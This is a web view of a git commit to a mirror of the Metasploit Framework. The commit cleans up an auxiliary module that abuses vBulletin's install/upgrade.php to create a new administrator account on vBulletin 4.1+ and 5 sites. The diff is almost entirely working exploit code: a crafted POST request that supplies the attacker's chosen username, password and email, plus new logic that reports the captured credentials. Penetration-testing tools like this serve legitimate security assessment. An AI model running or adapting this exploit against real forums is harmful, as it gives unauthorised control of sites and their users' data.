infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Clean module and add reporting

bug/bundler_fix
jvazquez-r7 2013-10-09 13:54:28 -05:00
parent 5c36533742
commit 4f3bbaffd1
1 changed files with 27 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

36
modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb
View File

@ -10,14 +10,15 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'vBulletin Administrator Account Creation', 'Name' => 'vBulletin Administrator Account Creation',
'Description' => %q{ 'Description' => %q{
This module abuses the "install/upgrade.php" component on vBulletin 4.1+ and 4.5+ to This module abuses the "install/upgrade.php" component on vBulletin 4.1+ and 4.5+ to
create a new administrator account, as exploited in the wild on October 2013. The module create a new administrator account, as exploited in the wild on October 2013. This module
has been tested successfully on vBulletin 4.1.5. has been tested successfully on vBulletin 4.1.5 and 4.1.0.
}, },
'Author' => 'Author' =>
[ [
@ -28,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary
'References' => 'References' =>
[ [
[ 'URL', 'http://www.net-security.org/secworld.php?id=15743' ], [ 'URL', 'http://www.net-security.org/secworld.php?id=15743' ],
[ 'URL', 'http://packetstormsecurity.org/files/59347/boa-bypass.txt.html'] [ 'URL', 'http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5']
], ],
'DisclosureDate' => 'Oct 09 2013')) 'DisclosureDate' => 'Oct 09 2013'))
@ -41,18 +42,26 @@ class Metasploit3 < Msf::Auxiliary
], self.class) ], self.class)
end end
def user
datastore["USERNAME"]
end
def pass
datastore["PASSWORD"]
end
def peer def peer
return "#{rhost}:#{rport}" return "#{rhost}:#{rport}"
end end
def run def run
if datastore["USERNAME"] == datastore["PASSWORD"] if user == pass
print_error("#{peer} - Please select a password different than the username") print_error("#{peer} - Please select a password different than the username")
return return
end end
print_status("#{peer} - Trying a new admin account...") print_status("#{peer} - Trying a new admin vBulletin account...")
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "install", "upgrade.php"), 'uri' => normalize_uri(target_uri.path, "install", "upgrade.php"),
@ -68,9 +77,9 @@ class Metasploit3 < Msf::Auxiliary
"options[skiptemplatemerge]" => "0", "options[skiptemplatemerge]" => "0",
"reponse" => "yes", "reponse" => "yes",
"htmlsubmit" => "1", "htmlsubmit" => "1",
"htmldata[username]" => datastore["USERNAME"], "htmldata[username]" => user,
"htmldata[password]" => datastore["PASSWORD"], "htmldata[password]" => pass,
"htmldata[confirmpassword]" => datastore["PASSWORD"], "htmldata[confirmpassword]" => pass,
"htmldata[email]" => datastore["EMAIL"] "htmldata[email]" => datastore["EMAIL"]
}, },
'headers' => { 'headers' => {
@ -79,7 +88,16 @@ class Metasploit3 < Msf::Auxiliary
}) })
if res and res.code == 200 and res.body =~ /Administrator account created/ if res and res.code == 200 and res.body =~ /Administrator account created/
print_good("#{peer} - Admin account successfully created") print_good("#{peer} - Admin account with credentials #{user}/#{pass} successfully created")
report_auth_info(
:host => rhost,
:port => rport,
:sname => 'http',
:user => user,
:pass => pass,
:active => true,
:proof => res.body
)
else else
print_error("#{peer} - Admin account creation failed") print_error("#{peer} - Admin account creation failed")
end end